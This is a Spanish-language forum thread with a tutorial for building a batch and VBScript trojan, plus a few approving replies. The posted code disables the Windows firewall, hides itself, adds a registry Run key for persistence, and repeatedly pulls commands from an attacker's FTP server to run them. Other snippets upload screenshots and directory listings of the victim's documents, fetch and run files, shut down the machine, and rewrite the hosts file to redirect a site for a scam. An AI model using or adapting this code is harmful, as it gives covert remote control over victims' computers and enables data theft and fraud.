WINTXCODERS

Programación => Scripting => Mensaje iniciado por: WIитX en Enero 10, 2015, 04:16:08 PM

Título: De todo un poco batch
Publicado por: WIитX en Enero 10, 2015, 04:16:08 PM
Hola, en este post voy a explicar como crear una especie de troyano en batch y algo de vbs con el cual podremos ejecutar archivos de comandos de forma oculta en equipos remotos y en la mayoria de los casos este tipo de troyano no sera detectado por el antivirus.

Primero necesitamos crear un servidor FTP, por ejemplo en www.000webhost.com ya que es necesario que se permita alojar archivos .bat, .exe, etc... y por ejemplo este hosting si lo permite.
una vez creado el servidor FTP (no doi muchos datos del proceso porque es bien facil) vamos a pasar a crear el servidor del troyano, asi que abrimos el bloc de notas y copiamos el siguiente codigo:

NOTA: el funcionamiento del script sera ir conectando de forma reiterada al servidor FTP y si existe el archivo code.bat y lo descarga y lo ejecuta, si no lo vuelve a intentar.

Código:

@echo off
cd %windir%
echo @echo off>server.bat
echo netsh firewall set opmode disable>>server.bat
echo :code>>server.bat
echo cls>>server.bat
echo ping -n 45 127.0.0.1^>nul>>server.bat
echo echo user^>ftp.txt>>server.bat
echo echo pass^>^>ftp.txt>>server.bat
echo echo get code.bat^>^>ftp.txt>>server.bat
echo echo del code.bat^>^>ftp.txt>>server.bat
echo echo bye^>^>ftp.txt>>server.bat
echo echo quit^>^>ftp.txt>>server.bat
echo ftp -s:ftp.txt 111.222.333.444>>server.bat
echo call :bytes code.bat>>server.bat
echo :bytes>>server.bat
echo if ^["%%~z1"^] GTR ^["1"^] (goto :true^) else (goto :false^)>>server.bat
echo :true>>server.bat
echo del /f /q ftp.txt>>server.bat
echo start code.vbs>>server.bat
echo goto :code>>server.bat
echo :false>>server.bat
echo del /f /q ftp.txt>>server.bat
echo del /f /q code.bat>>server.bat
echo goto :code>>server.bat
echo set objshell = createobject ("wscript.shell")>code.vbs
echo objshell.run "code.bat", vbhide>>code.vbs
echo set objshell = createobject ("wscript.shell")>server.vbs
echo objshell.run "server.bat", vbhide>>server.vbs
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ftp /d %windir%\server.vbs
start server.vbs
del /f /q %0



en el debemos reemplazar:

user, pass y 111.222.333.444 por el nombre de usuario, clave y dirección IP del servidor FTP, y lo guardamos con extension .bat

Ahora solo queda conseguir que la "victima" ejecute este archivo .bat que es el servidor, una vez infectada para realizar acciones en el equipo remoto solo debemos subir a la raiz del servidor FTP un archivo de comandos nombrado code.bat, cuando el archivo ya no este en el servidor FTP quedra decir que ya ha sido descargado al equipo de la victima y se ha ejecutado, y por tanto podremos poner otro si queremos.

A continuacion pongo algunos codes en batch que simulan algunas de las acciones mas comunes de un troyano:

Apagar equipo:

Código:

@echo off
shutdown -s -t 00
del /f /q %0



Cerrar proceso:

Código:

@echo off
taskkill /f /im proceso.exe
del /f /q %0



Subir archivo:

Código:

@echo off
echo user>ftp1.txt
echo pass>>ftp1.txt
echo get archivodelftp>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
start archivodelftp
del /f /q %0



Descargar archivo:

Código:

@echo off
echo user>ftp1.txt
echo pass>>ftp1.txt
echo put "ruta archivo">>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q %0



Capturar pantalla: (necesita que anteriormente le hayais instalado nircmd)

Código:

@echo off
nircmd.exe savescreenshot imagen.jpg
echo user>ftp1.txt
echo pass>>ftp1.txt
echo put imagen.jpg>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q imagen.jpg
del /f /q %0



Ver carpetas importantes del equipo:

Código:

@echo off
cd %windir%
echo. >lista.txt
cd %programfiles%
dir /a>>%windir%\lista.txt
cd %userprofile%\Mis documentos
dir /a /s>>%windir%\lista.txt
cd %userprofile%\Escritorio
dir /a /s>>%windir%\lista.txt
cd %windir%
echo user>ftp1.txt
echo pass>>ftp1.txt
echo put lista.txt>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q %0



Infectar con scam (al archivo hosts)

Código:

@echo off
echo 111.111.111.111 http://weboriginal.com >>%windir%\system32\drivers\etc\hosts
echo 111.111.111.111 www.weboriginal.com >>%windir%\system32\drivers\etc\hosts
echo 111.111.111.111 weboriginal.com >>%windir%\system32\drivers\etc\hosts
del /f /q %0



Dejar hosts limpios (quitar scams)

Código:

@echo off
cd %windir%\system32\drivers\etc
del /f /q hosts
echo user>ftp1.txt
echo pass>>ftp1.txt
echo get hosts>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q %0



Espero que sea util, salu2

cualquier duda o sugerencia postearla.
Título: Re:De todo un poco batch
Publicado por: PAYASAKX en Enero 13, 2015, 09:46:42 PM
Muy interesante este tutorial, es de las pocas veces que veo un Troyano programado en Batch, me parece super interesante esto del Batch, ya que puedes hacer muchas cosas con él.
Título: Re:De todo un poco batch
Publicado por: WIитX en Enero 13, 2015, 10:26:01 PM
Debería de ser más correcto llamarle un script en vez de troyano pero bueno ^^
Título: Re:De todo un poco batch
Publicado por: PAYASAKX en Enero 13, 2015, 10:48:16 PM
You are not allowed to view links. Register or Login
Debería de ser más correcto llamarle un script en vez de troyano pero bueno ^^
mm Sí, yo tambien lo llamaria script, pero el post es tuyo jeje, corrige si quieres .

PD; Tengo que probarlo eh.